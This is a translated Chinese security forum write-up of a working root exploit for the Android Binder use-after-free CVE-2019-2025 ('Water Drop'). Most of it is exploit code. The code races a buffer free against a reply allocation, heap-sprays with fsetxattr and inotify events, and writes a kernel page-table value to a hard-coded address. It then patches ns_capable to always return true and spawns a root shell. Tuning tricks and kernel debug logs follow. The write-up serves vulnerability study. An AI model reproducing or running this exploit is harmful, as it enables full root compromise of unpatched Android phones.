CVE-2019-2025 ("Water Drop") Exploitation


This article is a featured post from the Kanxue (Pediy) forum.
Kanxue forum author ID: jltxgcy

This article is for learning and discussion only; the author assumes no legal responsibility for any other use.

I. Vulnerability Overview
CVE-2019-2025 (the "Water Drop" vulnerability) was reported by the C0RE Team, who presented an exploitation technique at HITBSecConf2019. Unfortunately, no exploit source code was released, which makes the vulnerability harder to study directly.
This article explains the vulnerability from the perspective of working exploit source code, which roots a Pixel phone with a success rate of roughly 99%. It also shares the debugging approach I used while writing the exploit and how the various problems along the way were solved.
II. Root Cause
I will not restate the root cause in detail here; see "水滴"来袭:详解Binder内核通杀漏洞 ("'Water Drop' Incoming: A Detailed Analysis of the Universal Binder Kernel Vulnerability", reference [2]). Put simply, two threads race against each other: a client thread and a server thread.

Figure 1 is taken from "D2T2 - Binder - The Bridge to Root - Hongli Han & Mingjian Zhou" [1].
The client thread executes BC_FREE_BUFFER; the relevant code is shown below:

Figure 2 is taken from "D2T2 - Binder - The Bridge to Root - Hongli Han & Mingjian Zhou" [1].
The server thread executes BC_REPLY; the relevant code is shown below:

Figure 3 is taken from "D2T2 - Binder - The Bridge to Root - Hongli Han & Mingjian Zhou" [1].

Why does the binder_buffer have to be freed twice?
Figure 4 is taken from "D2T2 - Binder - The Bridge to Root - Hongli Han & Mingjian Zhou" [1].
Only when the preceding binder_buffer is freed does the kernel, in order to merge it with the following binder_buffer, actually kfree() that following binder_buffer.
III. Exploitation Details
1. How does the client thread get to execute BC_FREE_BUFFER, and how does the server process get to execute BC_REPLY (binder_alloc_new_buffer)?
class MediaPlayerBase : public MediaPlayer
{
    public:
        MediaPlayerBase() {};
        ~MediaPlayerBase() {};
        sp<IMediaPlayer> creatMediaPlayer()
        {
            sp<IMediaPlayerService> service(getMediaPlayer());
                sp<IMediaPlayer> player(service->create(this, getAudioSessionId()));
            return player;
        }
};
 
sp<IMediaPlayerService> getMediaPlayer()
{
    sp<IServiceManager> sm = defaultServiceManager();
    String16 name = String16("media.player");
    sp<IBinder> service = sm->checkService(name);
    sp<IMediaPlayerService> mediaService = interface_cast<IMediaPlayerService>(service);
 
    return mediaService;
 
}
 
void bc_free_buffer(int replyParcelIndex)
{
    replyArray[replyParcelIndex].~Parcel();
    IPCThreadState::self()->flushCommands();
}
 
void* bc_transaction(void *arg)
{
    .....
    dataBCArray[global_parcel_index].writeInterfaceToken(String16("android.media.IMediaPlayer"));
        IInterface::asBinder(mediaPlayer)->transact(GET_PLAYBACK_SETTINGS, dataBCArray[global_parcel_index], &replyBCArray[global_parcel_index], 0);
    .....
    return arg;
}
MediaPlayerBase* mediaPlayerBase = new MediaPlayerBase();
mediaPlayer = mediaPlayerBase->creatMediaPlayer();

This part is not hard to follow. Because it uses many framework-layer APIs, the exploit must be compiled inside the Android source tree.
2. Executing BC_FREE_BUFFER, as just described, requires binder_buffers to have been allocated beforehand -- something can only be freed after it has been allocated. This step is called placing the baits.
void put_baits()
{
    
    for (int i = 0; i < BAIT; i++)
    {
        dataArray[i].writeInterfaceToken(String16("android.media.IMediaPlayer"));
        IInterface::asBinder(mediaPlayer)->transact(GET_PLAYBACK_SETTINGS, dataArray[i], &replyArray[i], 0);
        gDataArray[i] = replyArray[i].data();
        
        
    }
}
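The BAIT constant and the Parcel arrays used above are not defined in the excerpts shown here. A minimal sketch of what such definitions might look like (the value of BAIT is purely illustrative, not taken from the article):
#include <binder/Parcel.h>
#include <media/IMediaPlayer.h>

using namespace android;

#define BAIT 400                                      // number of bait buffers; illustrative value

static sp<IMediaPlayer> mediaPlayer;                  // obtained via creatMediaPlayer()
static Parcel dataArray[BAIT], replyArray[BAIT];      // bait request/reply parcels
static Parcel dataBCArray[BAIT], replyBCArray[BAIT];  // parcels used by bc_transaction()
static const uint8_t *gDataArray[BAIT];               // userspace addresses of the bait replies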
3. The race
void bc_free_buffer(int replyParcelIndex)
{
    replyArray[replyParcelIndex].~Parcel();
    IPCThreadState::self()->flushCommands();
}
 
void* bc_transaction(void *arg)
{
    pthread_mutex_lock(&alloc_mutex);
    while(1)
    {
        pthread_cond_wait(&alloc_cond, &alloc_mutex);
        dataBCArray[global_parcel_index].writeInterfaceToken(String16("android.media.IMediaPlayer"));
                IInterface::asBinder(mediaPlayer)->transact(GET_PLAYBACK_SETTINGS, dataBCArray[global_parcel_index], &replyBCArray[global_parcel_index], 0);
    }
    pthread_mutex_unlock(&alloc_mutex);
        
    return arg;
}
 
void raceWin(int replyParcelIndex)
{
    pthread_mutex_lock(&alloc_mutex);
    bc_free_buffer(replyParcelIndex);
    global_parcel_index = replyParcelIndex;
    pthread_cond_signal(&alloc_cond);
    pthread_mutex_unlock(&alloc_mutex);
    usleep(450);
    bc_free_buffer(replyParcelIndex);
    bc_free_buffer(replyParcelIndex - 1);
}
 
void raceTimes()
{
    for(int i = BAIT - 1; i > 0; i--)
    {
        raceWin(i);
    }
}
Two threads are started. Thread 1 executes BC_FREE_BUFFER; thread 2 issues a binder request that makes the mediaserver process execute BC_REPLY (binder_alloc_new_buffer). Thread 1 wakes thread 2 through a condition variable.

usleep(450);
bc_free_buffer(replyParcelIndex);
bc_free_buffer(replyParcelIndex - 1);
 

dataBCArray[global_parcel_index].writeInterfaceToken(String16("android.media.IMediaPlayer"));
                IInterface::asBinder(mediaPlayer)->transact(GET_PLAYBACK_SETTINGS, dataBCArray[global_parcel_index], &replyBCArray[global_parcel_index], 0);
Thread 1 and thread 2 execute these two operations concurrently, producing the race. Why usleep(450)? Because thread 2 goes through binder IPC, and it takes some time before mediaserver executes BC_REPLY; adjust this value according to your own device.
In short, the goal is to make the client process (BC_FREE_BUFFER) and the server process (BC_REPLY) race against each other. Looking at where BC_FREE_BUFFER and BC_REPLY sit in Figure 1 helps in understanding this part. The server process referred to here is the mediaserver process.
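createAllocThread() is called from main() in section IV below but its body is not shown. A minimal sketch, assuming it only has to initialize the synchronization objects used by raceWin()/bc_transaction() and start the trigger thread:
#include <pthread.h>

pthread_mutex_t alloc_mutex = PTHREAD_MUTEX_INITIALIZER;
pthread_cond_t  alloc_cond  = PTHREAD_COND_INITIALIZER;
int             global_parcel_index = 0;
static pthread_t alloc_thread;

void createAllocThread()
{
    // bc_transaction() blocks on alloc_cond until raceWin() hands it the index
    // of the Parcel whose binder_buffer has just been freed.
    pthread_create(&alloc_thread, NULL, bc_transaction, NULL);
}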
4. Heap spraying
void heapGuard()
{
    fsetxattr(fd_guard_heap, "user.g", guardBuffer, 1000, 0);
}
 
void heap_spray()
{
    char buff[BUFF_SIZE];
    memset(buff, 0 ,BUFF_SIZE);
    *(size_t *)((char *)buff + 64) = 20;
    *(size_t *)((char *)buff + 88) = 0xffffffc001e50834;
    fsetxattr(fd_heap_spray, "user.x", buff, BUFF_SIZE, 0);
}
 
void heap_spray_times()
{
    for (int i = 0; i < HEAP_SPRAY_TIME; i++)
    {
        heap_spray();
        heapGuard();
    }
}
 
void raceWin(int replyParcelIndex)
{
    pthread_mutex_lock(&alloc_mutex);
    bc_free_buffer(replyParcelIndex);
    global_parcel_index = replyParcelIndex;
    pthread_cond_signal(&alloc_cond);
    pthread_mutex_unlock(&alloc_mutex);
    usleep(450);
    bc_free_buffer(replyParcelIndex);
    bc_free_buffer(replyParcelIndex - 1);
    heap_spray_times();
    ...
}
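The constants and file descriptors used by heap_spray() and heapGuard() are likewise not defined in the excerpts. A sketch of plausible definitions -- only BUFF_SIZE is corroborated by the size:96 lines in the debug log of section IV; the rest is illustrative:
#define BUFF_SIZE        96    // spray payload size; matches "size:96" in the debug log
#define HEAP_SPRAY_TIME  20    // spray/guard rounds per race attempt; illustrative, tune per device

int  fd_heap_spray;            // opened on .../test_dir/abcd.txt (see section IV.8)
int  fd_guard_heap;            // opened on a second file inside the watched directory
char guardBuffer[1000];        // dummy xattr payload for the 1000-byte guard kvalue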

After the binder_buffer has been freed, we heap-spray with fsetxattr to reoccupy the chunk and take control of the binder_buffer's data_size and data fields.
struct binder_buffer {
        struct list_head entry; 
        struct rb_node rb_node; 
                                
        unsigned free:1;
        unsigned allow_user_free:1;
        unsigned async_transaction:1;
        unsigned free_in_progress:1;
        unsigned debug_id:28;
 
        struct binder_transaction *transaction;
 
        struct binder_node *target_node;
        size_t data_size;
        size_t offsets_size;
        size_t extra_buffers_size;
        void *data;
};
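For reference, the arm64 field offsets of this struct work out as follows (a sketch derived from the definition above; the two offsets written by heap_spray() fall out of it):
/* struct binder_buffer field offsets on arm64:
 *
 *    0 .. 15   entry (struct list_head)
 *   16 .. 39   rb_node (struct rb_node)
 *   40 .. 47   bitfields (free / allow_user_free / async_transaction / ...) + padding
 *   48 .. 55   transaction
 *   56 .. 63   target_node
 *   64 .. 71   data_size             <- heap_spray() writes 20 here
 *   72 .. 79   offsets_size
 *   80 .. 87   extra_buffers_size
 *   88 .. 95   data                  <- heap_spray() writes the target kernel address here
 */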

Because we want an arbitrary kernel write, the data field of binder_buffer, at offset 88, has to be overwritten with the target address; see the heap_spray function.
t->buffer = binder_alloc_new_buf(&target_proc->alloc, tr->data_size,
                tr->offsets_size, extra_buffers_size,
                !reply && (t->flags & TF_ONE_WAY));
        if (IS_ERR(t->buffer)) {
                
                return_error_param = PTR_ERR(t->buffer);
                return_error = return_error_param == -ESRCH ?
                        BR_DEAD_REPLY : BR_FAILED_REPLY;
                return_error_line = __LINE__;
                t->buffer = NULL;
                goto err_binder_alloc_buf_failed;
        }
        t->buffer->allow_user_free = 0;
        t->buffer->debug_id = t->debug_id;
        t->buffer->transaction = t;
        t->buffer->target_node = target_node;
        trace_binder_transaction_alloc_buf(t->buffer);
        off_start = (binder_size_t *)(t->buffer->data +
                                      ALIGN(tr->data_size, sizeof(void *)));
        offp = off_start;
 
        if (copy_from_user(t->buffer->data, (const void __user *)(uintptr_t)
                           tr->data.ptr.buffer, tr->data_size))
5. Which address is modified, and with what?
Following the Kernel Space Mirror Attack (KSMA) used in the earlier post [原创] CVE-2017-7533 漏洞利用 (see references [3] and [4]), the value 0x80000e71 needs to be written to 0xffffffc001e50840. Looking at the copy_from_user call above: t->buffer->data has been replaced with 0xffffffc001e50834, and the source data and size are tr->data.ptr.buffer and tr->data_size. So how do we control the source data and its size?
status_t init_reply_data()
{
    setDataSource();
    AudioPlaybackRate rate;
    rate.mSpeed = 1;
    rate.mPitch = 1;
    rate.mStretchMode = (AudioTimestretchStretchMode)0;
    rate.mFallbackMode = (AudioTimestretchFallbackMode)0x80000e71;
        return mediaPlayer->setPlaybackSettings(rate);
}
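setDataSource() above is a small helper of the author's that is not shown. A sketch of what it presumably does, assuming the fd-based IMediaPlayer::setDataSource overload and an illustrative media file path (a data source is needed so that mediaserver has a player instance for setPlaybackSettings to act on):
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <utils/Errors.h>

using namespace android;

status_t setDataSource()
{
    int fd = open("/data/local/tmp/test.mp3", O_RDONLY);   // illustrative path
    if (fd < 0)
        return UNKNOWN_ERROR;

    struct stat st;
    fstat(fd, &st);
    status_t err = mediaPlayer->setDataSource(fd, 0, st.st_size);
    close(fd);
    return err;
}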
How exactly do these values get set? Readers can work through the binder IPC flow to understand it.
At this point the destination address is 0xffffffc001e50834 and the payload is 0x80000e71. Since rate.mSpeed, rate.mPitch and rate.mStretchMode occupy 12 bytes, once copy_from_user finishes, address 0xffffffc001e50840 has been filled with 0x80000e71.
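Laid out explicitly (a sketch that simply restates the arithmetic above):
/* Destination of the hijacked copy_from_user:
 *
 *   0xffffffc001e50834 + 0x0 : rate.mSpeed        (4 bytes)
 *   0xffffffc001e50834 + 0x4 : rate.mPitch        (4 bytes)
 *   0xffffffc001e50834 + 0x8 : rate.mStretchMode  (4 bytes)
 *   0xffffffc001e50834 + 0xc : rate.mFallbackMode = 0x80000e71
 *                              -> address 0xffffffc001e50840 receives 0x80000e71
 */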
From this point on, arbitrary kernel addresses can be read and written from user space.
6. Privilege escalation
void kernel_patch_ns_capable(unsigned long * addr) {
        unsigned int *p = (unsigned int *)addr;
 
        p[0] = 0xD2800020;      /* AArch64: mov x0, #1 */
        p[1] = 0xD65F03C0;      /* AArch64: ret        */
}
 
    /* rebase ns_capable's kernel VA into the user-writable mirror mapping set up by the KSMA write (see reference [4]) */
    unsigned long ns_capable_addr = 0xffffffc0000b1024 - 0xffffffc000000000 + 0xffffffc200000000;
    kernel_patch_ns_capable((unsigned long *) ns_capable_addr);
    if (setreuid(0, 0) || setregid(0, 0)) {
        printf("[-] setgid failed\n");
        return -1;
    }
    if (getuid() == 0)
    {
        printf("[+] spawn a root shell\n");
        execl("/system/bin/sh", "/system/bin/sh", NULL);
    }
ns_capable is patched directly so that it always returns 1; after that, setreuid and setregid succeed and privilege escalation is complete.

For how ns_capable_addr is computed, refer to [原创] CVE-2017-7533 漏洞利用 (reference [3]).

IV. Exploit Tuning and Debugging
1. To make the race between the client and the server process easier to win, both must run on the same CPU.
Since we cannot sched_setaffinity the mediaserver process onto a chosen CPU, the approach taken here is to start 8 threads on each of the other CPUs (on a 4-core device, keeping 3 cores busy) and burn them with an infinite loop.
void* fillCpu(void *arg)
{
        int index = *(int *)arg;
    cpu_set_t mask;
        CPU_ZERO(&mask);
        CPU_SET(index, &mask);
    pid_t pid = gettid();
    syscall(__NR_sched_setaffinity, pid, sizeof(mask), &mask);
    
    while (!fillFlag)
    {
        index++;
    }
 
        return arg;
}
 
void fillOtherCpu()
{
    int cores = getCores();
    printf("[+] cpu count:%d\n", cores);

    /* Keep CPUs 0, 2 and 3 busy, leaving one CPU free so that the client
     * threads and mediaserver's binder thread end up sharing it. */
    static int cpus[3] = {0, 2, 3};
    pthread_t ids[3][8];

    for (int i = 0; i < 3; i++)
        for (int j = 0; j < 8; j++)
            pthread_create(&ids[i][j], NULL, fillCpu, &cpus[i]);

    sleep(10);
}
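getCores() is not shown in the article; a one-line sketch of what it presumably does:
#include <unistd.h>

int getCores()
{
    return (int)sysconf(_SC_NPROCESSORS_CONF);
}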
2. fsetxattr frees the sprayed memory immediately.
static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
     size_t size, int flags)

{
    int error;
    void *kvalue = NULL;
    void *vvalue = NULL;
    char kname[XATTR_NAME_MAX + 1];
 
    if (flags & ~(XATTR_CREATE|XATTR_REPLACE))
        return -EINVAL;
 
    error = strncpy_from_user(kname, name, sizeof(kname));
    if (error == 0 || error == sizeof(kname))
        error = -ERANGE;
    if (error < 0)
        return error;
 
    if (size) {
        if (size > XATTR_SIZE_MAX)
            return -E2BIG;
        kvalue = kmalloc(size, GFP_KERNEL | __GFP_NOWARN);
        if (!kvalue) {
            vvalue = vmalloc(size);
            if (!vvalue)
                return -ENOMEM;
            kvalue = vvalue;
        }
        if (copy_from_user(kvalue, value, size)) {
            error = -EFAULT;
            goto out;
        }
        if ((strcmp(kname, XATTR_NAME_POSIX_ACL_ACCESS) == 0) ||
            (strcmp(kname, XATTR_NAME_POSIX_ACL_DEFAULT) == 0))
            posix_acl_fix_xattr_from_user(kvalue, size);
    }
 
    error = vfs_setxattr(d, kname, kvalue, size, flags);
out:
    if (vvalue)
        vfree(vvalue);
    else
        kfree(kvalue);
    return error;
}

If you just call fsetxattr in a loop, you will find that the sprayed address is always the same, because each allocation is freed as soon as it is made.
So a structure that is not released right after allocation is used to hold on to the just-freed memory. The structure used here is inotify_event_info.

Figure 5 is taken from "D2T2 - Binder - The Bridge to Root - Hongli Han & Mingjian Zhou" [1].
void heapGuard()
{
    fsetxattr(fd_guard_heap, "user.g", guardBuffer, 1000, 0);
}
Because fsetxattr changes a file's extended attributes, it triggers file monitoring: inotify_handle_event is called, which kmalloc's an event.
The kvalue kmalloc'd by fsetxattr is 96 bytes, and the event kmalloc'd by inotify_handle_event is arranged here to be 65 bytes (the file name is fffdfffdfffdfffd), so that it reoccupies the memory setxattr has just freed. Since the event is not freed immediately, the contents left behind in kvalue are preserved.
If fsetxattr is then called again (one fsetxattr / inotify_handle_event round has already happened) to allocate a new kvalue, the just-freed kvalue has already been taken by the event, so a fresh chunk is allocated -- and this is what makes heap-spray occupation possible.
Note that the event's length must be chosen carefully so that it does not clobber offsets 64 and 88 of the kvalue allocated by fsetxattr, because the information stored there is needed at copy_from_user time.

Figure 6 is taken from "D2T2 - Binder - The Bridge to Root - Hongli Han & Mingjian Zhou" [1].
The "State area" in the figure is the content at offsets 64 and 88 of the kvalue allocated by fsetxattr; this part must not be corrupted.
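The initialization of fd_guard_heap and guardBuffer is not shown either. A sketch, assuming the guard file is the 16-character fffdfffdfffdfffd file inside the watched test_dir directory (that name length is what yields the 65-byte inotify_event_info mentioned above):
#include <fcntl.h>
#include <stdio.h>
#include <string.h>

extern int  fd_guard_heap;      // declared together with the other spray globals
extern char guardBuffer[1000];

void init_fd_guard_heap()
{
    // hypothetical path; every fsetxattr() on this file raises an inotify event
    fd_guard_heap = open("/data/local/tmp/test_dir/fffdfffdfffdfffd", O_WRONLY);
    if (fd_guard_heap < 0)
        printf("[-] fd_guard_heap failed\n");
    memset(guardBuffer, 'g', sizeof(guardBuffer));  // dummy xattr payload
}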
3. Set the client process's priority higher than the server process's, so that the client can preempt the server.
int main()
{
    createAllocThread();
    nice(-20);
    MediaPlayerBase* mediaPlayerBase = new MediaPlayerBase();
    mediaPlayer = mediaPlayerBase->creatMediaPlayer();
        .....
}

The priority is raised only after the allocation thread has been started, because the allocation thread's priority would otherwise affect the server process's priority.
4. Heap-spray guard details
void begin_watch()
{
        watch_fd = inotify_init1(IN_NONBLOCK);
        if (watch_fd == -1) {
                printf("[-] inotify_init1 failed\n");
                return;
        }
 
        watch_wd = inotify_add_watch(watch_fd, "test_dir",
                                 IN_ALL_EVENTS);
        if (watch_wd == -1) {
                printf("[-] Cannot watch\n");
                return;
        }
}
 
void stop_watch()
{
    inotify_rm_watch(watch_fd, watch_wd);
    if (watch_fd != -1)
    {
        close(watch_fd);
    }
}
 
void restartWatch()
{
    if (global_parcel_index % 200 == 0)
    {
        stop_watch();
        usleep(100);
        begin_watch();
        usleep(100);
    }
}
 
void raceWin(int replyParcelIndex)
{
    pthread_mutex_lock(&alloc_mutex);
    bc_free_buffer(replyParcelIndex);
    global_parcel_index = replyParcelIndex;
    pthread_cond_signal(&alloc_cond);
    pthread_mutex_unlock(&alloc_mutex);
    usleep(450);
    bc_free_buffer(replyParcelIndex);
    bc_free_buffer(replyParcelIndex - 1);
    heap_spray_times();
    restartWatch();
}

As you can see, the watch is restarted every 200 iterations. Why?
int fsnotify_add_event(struct fsnotify_group *group,
               struct fsnotify_event *event,
               int (*merge)(struct list_head *,
                            struct fsnotify_event *))
{
    int ret = 0;
    struct list_head *list = &group->notification_list;
 
    pr_debug("%s: group=%p event=%p\n", __func__, group, event);
 
    mutex_lock(&group->notification_mutex);
 
    if (group->q_len >= group->max_events) {
        ret = 2;
        
        if (!list_empty(&group->overflow_event->list)) {
            mutex_unlock(&group->notification_mutex);
            return ret;
        }
        event = group->overflow_event;
        goto queue;
    }
       ...
}

Because once the queue exceeds a certain length, a newly allocated event is freed immediately, which obviously defeats our purpose and also causes crashes: the freed chunk may not be reoccupied by us, another thread may grab it and zero it, so t->buffer->data ends up as 0 and the kernel crashes.
Restarting the watch first releases all previously allocated events, so the events allocated afterwards stay under the limit.
5. Debugging the exploit
Without printk, how would we know whether the race was won, or whether the heap spray occupied the right spot? So printk calls are added at the relevant places in the kernel code.

struct binder_buffer *binder_alloc_prepare_to_free(struct binder_alloc *alloc,
                                                   uintptr_t user_ptr)
{
        struct binder_buffer *buffer;
        printk(KERN_INFO "jltxgcy binder free begin, pid:%d, user addr:%016llx\n", alloc->pid, (u64)user_ptr);
        mutex_lock(&alloc->mutex);
        buffer = binder_alloc_prepare_to_free_locked(alloc, user_ptr);
        mutex_unlock(&alloc->mutex);
        printk(KERN_INFO "jltxgcy binder free end, pid:%d, buffer:%p\n", alloc->pid, buffer);
        return buffer;
}
 
struct binder_buffer *binder_alloc_new_buf(struct binder_alloc *alloc,
                                           size_t data_size,
                                           size_t offsets_size,
                                           size_t extra_buffers_size,
                                           int is_async)
{
        struct binder_buffer *buffer;
 
        mutex_lock(&alloc->mutex);
        printk(KERN_INFO "jltxgcy binder alloc begin, target pid:%d\n", alloc->pid);
        buffer = binder_alloc_new_buf_locked(alloc, data_size, offsets_size,
                                             extra_buffers_size, is_async);
        printk(KERN_INFO "jltxgcy binder alloc end, target pid:%d, buffer:%p, buffer user data:%lx\n", alloc->pid, buffer, (uintptr_t)buffer->data + binder_alloc_get_user_buffer_offset(alloc));
        mutex_unlock(&alloc->mutex);
        return buffer;
}
 
static void binder_delete_free_buffer(struct binder_alloc *alloc,
                      struct binder_buffer *buffer)
{
    struct binder_buffer *prev, *next = NULL;
    bool to_free = true;
    BUG_ON(alloc->buffers.next == &buffer->entry);
    prev = binder_buffer_prev(buffer);
    BUG_ON(!prev->free);
    if (prev_buffer_end_page(prev) == buffer_start_page(buffer)) {
        to_free = false;
        binder_alloc_debug(BINDER_DEBUG_BUFFER_ALLOC,
                   "%d: merge free, buffer %pK share page with %pK\n",
                   alloc->pid, buffer->data, prev->data);
    }
 
    if (!list_is_last(&buffer->entry, &alloc->buffers)) {
        next = binder_buffer_next(buffer);
        if (buffer_start_page(next) == buffer_start_page(buffer)) {
            to_free = false;
            binder_alloc_debug(BINDER_DEBUG_BUFFER_ALLOC,
                       "%d: merge free, buffer %pK share page with %pK\n",
                       alloc->pid,
                       buffer->data,
                       next->data);
        }
    }
 
    if (PAGE_ALIGNED(buffer->data)) {
        binder_alloc_debug(BINDER_DEBUG_BUFFER_ALLOC,
                   "%d: merge free, buffer start %pK is page aligned\n",
                   alloc->pid, buffer->data);
        to_free = false;
    }
 
    if (to_free) {
        binder_alloc_debug(BINDER_DEBUG_BUFFER_ALLOC,
                   "%d: merge free, buffer %pK do not share page with %pK or %pK\n",
                   alloc->pid, buffer->data,
                   prev->data, next->data);
        binder_update_page_range(alloc, 0, buffer_start_page(buffer),
                     buffer_start_page(buffer) + PAGE_SIZE);
    }
    list_del(&buffer->entry);
    kfree(buffer);
    printk(KERN_INFO "jltxgcy pid:%d, kfree:%p, cpuid:%d\n", alloc->pid, buffer, smp_processor_id());
}
 

static void binder_transaction(struct binder_proc *proc,
                   struct binder_thread *thread,
                   struct binder_transaction_data *tr, int reply,
                   binder_size_t extra_buffers_size) {
    t->buffer = binder_alloc_new_buf(&target_proc->alloc, tr->data_size,
        tr->offsets_size, extra_buffers_size,
        !reply && (t->flags & TF_ONE_WAY));
     
    if (IS_ERR(t->buffer)) {
        
        return_error_param = PTR_ERR(t->buffer);
        return_error = return_error_param == -ESRCH ?
            BR_DEAD_REPLY : BR_FAILED_REPLY;
        return_error_line = __LINE__;
        t->buffer = NULL;
        goto err_binder_alloc_buf_failed;
    }
     
    t->buffer->allow_user_free = 0;
    t->buffer->debug_id = t->debug_id;
    t->buffer->transaction = t;
    t->buffer->target_node = target_node;
    trace_binder_transaction_alloc_buf(t->buffer);
    off_start = (binder_size_t *)(t->buffer->data +
                      ALIGN(tr->data_size, sizeof(void *)));
    offp = off_start;
 
    printk(KERN_INFO "jltxgcy binder ocuppy end, target pid:%d, buffer:%p, free:%d, user_allow_free:%d, buffer data:%p, buffer user data:%lx, cupid:%d\n", target_proc->pid, t->buffer, t->buffer->free, t->buffer->allow_user_free, t->buffer->data, (uintptr_t)t->buffer->data + binder_alloc_get_user_buffer_offset(&target_proc->alloc), smp_processor_id());
    if (copy_from_user(t->buffer->data, (const void __user *)(uintptr_t)
               tr->data.ptr.buffer, tr->data_size)) {
        binder_user_error("%d:%d got transaction with invalid data ptr\n",
                proc->pid, thread->pid);
        return_error = BR_FAILED_REPLY;
        return_error_param = -EFAULT;
        return_error_line = __LINE__;
        goto err_copy_data_failed;
    }
        ....
}
 

static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
     size_t size, int flags)
{
    int error;
    void *kvalue = NULL;
    void *vvalue = NULL;
    char kname[XATTR_NAME_MAX + 1];
 
    if (flags & ~(XATTR_CREATE|XATTR_REPLACE))
        return -EINVAL;
 
    error = strncpy_from_user(kname, name, sizeof(kname));
    if (error == 0 || error == sizeof(kname))
        error = -ERANGE;
    if (error < 0)
        return error;
 
    if (size) {
        if (size > XATTR_SIZE_MAX)
            return -E2BIG;
        kvalue = kmalloc(size, GFP_KERNEL | __GFP_NOWARN);
        printk(KERN_INFO "jltxgcy pid:%d, kvalue:%p, size:%ld\n", current->pid, kvalue, size);
        if (!kvalue) {
            vvalue = vmalloc(size);
            if (!vvalue)
                return -ENOMEM;
            kvalue = vvalue;
        }
        if (copy_from_user(kvalue, value, size)) {
            error = -EFAULT;
            goto out;
        }
        if ((strcmp(kname, XATTR_NAME_POSIX_ACL_ACCESS) == 0) ||
            (strcmp(kname, XATTR_NAME_POSIX_ACL_DEFAULT) == 0))
            posix_acl_fix_xattr_from_user(kvalue, size);
    }
 
    error = vfs_setxattr(d, kname, kvalue, size, flags);
out:
    if (vvalue)
        vfree(vvalue);
    else
        kfree(kvalue);
    return error;
}
 

int inotify_handle_event(struct fsnotify_group *group,
             struct inode *inode,
             struct fsnotify_mark *inode_mark,
             struct fsnotify_mark *vfsmount_mark,
             u32 mask, void *data, int data_type,
             const unsigned char *file_name, u32 cookie)
{
    struct inotify_inode_mark *i_mark;
    struct inotify_event_info *event;
    struct fsnotify_event *fsn_event;
    int ret;
    int len = 0;
    int alloc_len = sizeof(struct inotify_event_info);
    BUG_ON(vfsmount_mark);
 
    if ((inode_mark->mask & FS_EXCL_UNLINK) &&
        (data_type == FSNOTIFY_EVENT_PATH)) {
        struct path *path = data;
 
        if (d_unlinked(path->dentry))
            return 0;
    }
    if (file_name) {
        len = strlen(file_name);
        alloc_len += len + 1;
    }
 
    pr_debug("%s: group=%p inode=%p mask=%x\n", __func__, group, inode,
         mask);
 
    i_mark = container_of(inode_mark, struct inotify_inode_mark,
                  fsn_mark);
 
    event = kmalloc(alloc_len, GFP_KERNEL);
    printk(KERN_INFO "jltxgcy pid:%d, event:%p, alloc_len:%d\n", current->pid, event, alloc_len);
    if (unlikely(!event))
        return -ENOMEM;
 
    fsn_event = &event->fse;
    fsnotify_init_event(fsn_event, inode, mask);
    event->wd = i_mark->wd;
    event->sync_cookie = cookie;
    event->name_len = len;
    if (len)
        strcpy(event->name, file_name);
    ret = fsnotify_add_event(group, fsn_event, inotify_merge);
    if (ret) {
        
        fsnotify_destroy_event(group, fsn_event);
    }
 
    if (inode_mark->mask & IN_ONESHOT)
        fsnotify_destroy_mark(inode_mark, group);
 
    return 0;
}

If the heap-spray occupation succeeds, the log should look like this:
[ 53.486434] c1   2536 jltxgcy binder alloc begin, target pid:2522
[ 53.486488] c1   2522 jltxgcy binder free begin, pid:2522, user addr:0000007dd3b3c8f0
[ 53.486523] c1   2536 jltxgcy binder alloc end, target pid:2522, buffer:ffffffc06ef79400, buffer user data:7dd3b3c8f0
[ 53.486543] c1   2522 jltxgcy binder free end, pid:2522, buffer:ffffffc06ef79400
[ 53.486554] c1   2522 jltxgcy pid:2522, kfree:ffffffc0be588280, cpuid:1
[ 53.486570] c1   2522 jltxgcy binder free begin, pid:2522, user addr:0000007dd3b3c8d8
[ 53.486577] c1   2522 jltxgcy binder free end, pid:2522, buffer:ffffffc06ef79280
[ 53.486585] c1   2522 jltxgcy pid:2522, kfree:ffffffc06ef79400, cpuid:1
[ 53.486604] c1   2522 jltxgcy pid:2522, kvalue:ffffffc0be588280, size:96
[ 53.486746] c1   2522 jltxgcy pid:2522, event:ffffffc0be588300, alloc_len:54
[ 53.486763] c1   2522 jltxgcy pid:2522, kvalue:ffffffc0c42bf400, size:1000
[ 53.486795] c1   2522 jltxgcy pid:2522, event:ffffffc0be588280, alloc_len:65
............. [lines omitted: the kfree'd chunk ffffffc06ef79400 is eventually reoccupied]
jltxgcy binder ocuppy end, target pid:2522, buffer:ffffffc06ef79400, free:0, user_allow_free:0, buffer data:ffffffc001e50834, buffer user data:7dd3b3c8f0, cupid:1

Note that "alloc begin" is printed inside the mutex_lock(&alloc->mutex) critical section, while "free begin" is printed outside it. So the execution flow is: the server enters the lock (alloc begin); the client then requests the lock (free begin) and goes to sleep; the server releases the lock (alloc end), which wakes the client; the client acquires the lock and executes free end.
The reason the client and server are forced onto one CPU is exactly this wait/wake mechanism: the client gets woken right as the narrow window opens, producing the race.
When we then free the preceding binder_buffer, the current binder_buffer is kfree'd (kfree:ffffffc06ef79400), and the heap spray reoccupies it. In the last log line you can see that the buffer's data pointer has already been set to the target address ffffffc001e50834.
6. A second look at the heap-spray occupation
[ 53.486604] c1   2522 jltxgcy pid:2522, kvalue:ffffffc0be588280, size:96        <- allocation 1 (spray kvalue)
[ 53.486746] c1   2522 jltxgcy pid:2522, event:ffffffc0be588300, alloc_len:54    <- allocation 2 (spray event)
[ 53.486763] c1   2522 jltxgcy pid:2522, kvalue:ffffffc0c42bf400, size:1000      <- allocation 3 (guard kvalue)
[ 53.486795] c1   2522 jltxgcy pid:2522, event:ffffffc0be588280, alloc_len:65    <- allocation 4 (guard event)

Because fsetxattr is called twice per round (once for the spray, once for the guard), the log above is produced.
Our goal is for allocation 4 to land on top of allocation 1. So the sizes of allocations 2 and 3 were chosen carefully to make sure neither of them takes allocation 1's place instead.
7. Why doesn't heapGuard use open? The usual way to trigger inotify_handle_event is open.
In fact I used open at first, but allocation 2 could never land on allocation 1. Eventually I found that on the open call path, error = security_file_alloc(f); had already taken allocation 1's spot, so I switched to setxattr instead.
8. The size of allocation 2 is in fact carefully designed; otherwise the kernel crashes.
In binder_transaction, after copy_from_user there is a check, BUG_ON(t->buffer->async_transaction != 0); if t->buffer->async_transaction is non-zero, the kernel crashes.

